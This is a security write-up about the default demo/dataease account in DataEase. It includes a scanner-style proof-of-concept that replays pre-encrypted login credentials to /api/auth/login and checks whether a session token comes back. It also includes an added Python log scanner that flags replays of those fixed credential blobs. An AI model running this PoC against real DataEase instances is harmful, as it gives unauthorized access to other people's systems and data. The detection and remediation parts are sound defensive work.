DataEase ships with a built-in account, demo/dataease, and many developers forget to delete it or change its password.
As a result, many DataEase instances can be logged into with this built-in account.
At login, the front-end JavaScript encrypts the username and password with the server's public key,
so the PoC sends username and password values that were already encrypted with that public key,
captured by logging in manually as demo/dataease in the web page.
PoC code [published]:

id: dataease-default-account

info:
  name: Dataease Default Account
  author: hbdxmz
  severity: high
  verified: true
  description: |
    Dataease has a built-in account demo/dataease, and many developers forget to delete or change the account password.
    As a result, many Dataease can log in with this built-in account.
    When logging in, js encrypts the account password with the public key,
    so poc uses the account password encrypted by the public key,
    manually uses demo/dataease when logging in to the web page.
    DataEase有一个内置的demo/dataease,许多开发人员忘记删除或更改帐户密码。
    因此,许多DataEase可以使用这个内置帐户登录。
    在登录时,js使用公钥加密帐号密码,PoC使用公钥加密的帐号密码,在登录网页时就手动使用demo/dataase登录。
  reference:
    - https://github.com/dataease/dataease/issues/5995
  tags: dataease
  created: 2023/11/30

rules:
  r0:
    request:
      method: POST
      headers:
        Content-Type: application/json
      path: /api/auth/login
      body: |
        {
          "username": "HmFJtDmMa9MZjlWEpCNAo7Yh/hRBI7mrCRfFTok7wES7qcpIJ04x0OQXW5fwtL4WtN29408wyAupmtMjvvXjag==",
          "password": "sL+oQsnErJMYGiLyzXj/Hy2opaZcSnfjGtYtm48q8tdkkINxzTtAOFI2NgDoorchFE790vWQYIgo1CMyjJ2jnw==",
          "loginType": 0
        }
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(b'"success":true,"message":null,"data":{"token":"ey')
expression: r0()
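Because the PoC replays two fixed ciphertext blobs, those blobs double as a detection signature for replays of this exact PoC. The following is an added example (not part of the PoC or of DataEase) that scans login-request logs for them and reports whether the demo account still answered with a token; it assumes a hypothetical JSON-lines proxy log that records the request body and response of POST /api/auth/login, with constructed sample lines embedded below.

```python
import json
from collections import Counter

# Ciphertext blobs copied verbatim from the published PoC. Since the PoC replays
# these fixed values, their appearance in a login body is a reliable indicator.
POC_USERNAME = "HmFJtDmMa9MZjlWEpCNAo7Yh/hRBI7mrCRfFTok7wES7qcpIJ04x0OQXW5fwtL4WtN29408wyAupmtMjvvXjag=="
POC_PASSWORD = "sL+oQsnErJMYGiLyzXj/Hy2opaZcSnfjGtYtm48q8tdkkINxzTtAOFI2NgDoorchFE790vWQYIgo1CMyjJ2jnw=="


def classify(entry):
    """Label one log entry (dict): 'poc-replay-success', 'poc-replay-attempt' or None."""
    if entry.get("method") != "POST" or entry.get("path") != "/api/auth/login":
        return None
    try:
        body = json.loads(entry.get("body") or "")
    except json.JSONDecodeError:
        return None
    if not isinstance(body, dict):
        return None
    if body.get("username") != POC_USERNAME and body.get("password") != POC_PASSWORD:
        return None
    # Same success condition the PoC checks: HTTP 200 and a JWT ("ey...") in the response.
    if entry.get("status") == 200 and '"token":"ey' in (entry.get("response") or ""):
        return "poc-replay-success"   # demo account is still live: disable it
    return "poc-replay-attempt"       # replay seen, but the login was refused


def scan(lines):
    """Count findings per (label, source IP) over JSON-lines log input."""
    findings = Counter()
    for raw in lines:
        if not raw.strip():
            continue
        entry = json.loads(raw)
        label = classify(entry)
        if label:
            findings[(label, entry.get("src"))] += 1
    return findings


def _line(src, status, username, password, response):
    # Build one constructed log line in the hypothetical proxy format.
    return json.dumps({"src": src, "method": "POST", "path": "/api/auth/login", "status": status,
                       "response": response,
                       "body": json.dumps({"username": username, "password": password, "loginType": 0})})


# Constructed sample log: one successful replay, one refused replay, one unrelated login.
SAMPLE_LOG = [
    _line("203.0.113.7", 200, POC_USERNAME, POC_PASSWORD,
          '{"success":true,"message":null,"data":{"token":"eyJhbGciOiJIUzI1NiJ9.example"}}'),
    _line("203.0.113.9", 401, POC_USERNAME, POC_PASSWORD,
          '{"success":false,"message":"login failed","data":null}'),
    _line("198.51.100.2", 200, "ZmFrZS1jaXBoZXJ0ZXh0LWZvci1hLXJlYWwtdXNlcg==", "ZmFrZS1wYXNzd29yZC1jaXBoZXJ0ZXh0",
          '{"success":true,"message":null,"data":{"token":"eyJhbGciOiJIUzI1NiJ9.example2"}}'),
]

if __name__ == "__main__":
    for (label, src), n in sorted(scan(SAMPLE_LOG).items()):
        print(f"{label:20} {src:15} x{n}")
```

A "poc-replay-success" finding means the instance still accepts the built-in account and the demo user should be removed or its password rotated, not just the alert closed.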